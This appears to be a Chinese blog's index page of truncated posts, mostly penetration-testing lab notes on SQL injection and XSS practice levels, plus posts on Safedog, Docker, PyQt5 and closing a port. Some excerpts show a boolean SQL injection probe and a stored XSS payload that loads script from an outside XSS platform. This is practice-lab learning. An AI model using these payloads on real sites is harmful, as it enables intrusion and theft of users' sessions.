原创 mbp 封神臺靶場 七(筆記)
打開鏈接,還是在上一關的基礎上進行操作,接上打開C盤發現有線索。兩個關於小芳的文件都打不開。 於是首先zip文件和txt文件啓用了ACL,需要進行更改,右鍵找到屬性》安全〉高級,把完全控制從拒絕改成允許。txt文本說解壓密碼就是
2020-07-02 23:19:39
原创 Sqlilabs lesson1-6
注入步驟 判斷注入點 使用且或非來判斷,即and、or、xor 一般使用and來進行判斷,以第一關爲例: http://172.16.54.161/sqli/Less-1/?id=1’ and ‘1’=‘1 返回正確 http:/
2020-07-02 23:19:39
原创 safedog在win系統phpstudy環境中遇到的坑
一開始安裝安全狗,會彈出服務名不存在,然後查找網上的解決方法,找到以下方法 cd c:\phpstudy_pro\Extensisions\Apache2.4.39 httpd.exe -k install -n apache2.
2020-05-20 06:13:27
原创 Mac 下使用 docker 安裝 vulnstudy靶場 初始化postgresql
docker mac版下載: https://hub.docker.com/editions/community/docker-ce-desktop-mac vulnstudy 集成靶場下載: https://github.
2020-05-08 01:22:14
3
原创 pyqt5登錄界面功能實現
最近做畢設用python實現一個登錄界面和個人信息維護界面,主要是用pyqt5模塊和sqlite數據庫,在借鑑前人的基礎上實現註冊、登錄、註銷和密碼修改功能。mainwindow.py爲登錄界面的ui,userwindow.py爲
2020-04-15 21:53:30
原创 mbp 封神臺靶場 二(筆記)
打開第二關的鏈接,是一個雕塑網頁,點開各個鏈接查看,在新聞動態裏點開了一個新聞,發現了熟悉的身影。 常理,還是用上一關的方法來測試一下,看看有沒有注入點,頁面顯示數據庫出錯,即可注入。 之後order by函數判斷字段數,可知字段
2020-02-24 19:35:40
原创 mbp 封神臺靶場 一(筆記)
最近在看掌控安全的公開課,裏面提到了封神臺靶場,因爲以前也做過網易雲課堂的靶場,便輕車熟路地註冊了賬號登陸靶場,先看了第一關。第一關是通過SQL注入找到管理員密碼,打開鏈接,點進去一看發現有貓膩。 一、尋找注入點 看到id=1
2020-02-24 19:35:40
2
原创 mbp 封神臺靶場 四 (筆記)
打開鏈接,發現是個留言板,嘗試xss注入,看看是否可行。 彈出1提示並發現字段變灰,說明注入成功,登錄xss平臺創建項目。 將此代碼段植入剛纔的區域中<script src=http://xsspt.com/2gVqle></sc
2020-02-24 19:35:40
原创 MacBook Pro 關閉指定端口
MacBook Pro 關閉Flask端口 用pycharm創建了一個Flask,看到默認端口爲loacalhost:5000,在運行完這個項目後,顯示故需要在終端輸入lsof -i:5000,終端顯示 lsof -i:5000
2020-02-24 19:35:40
1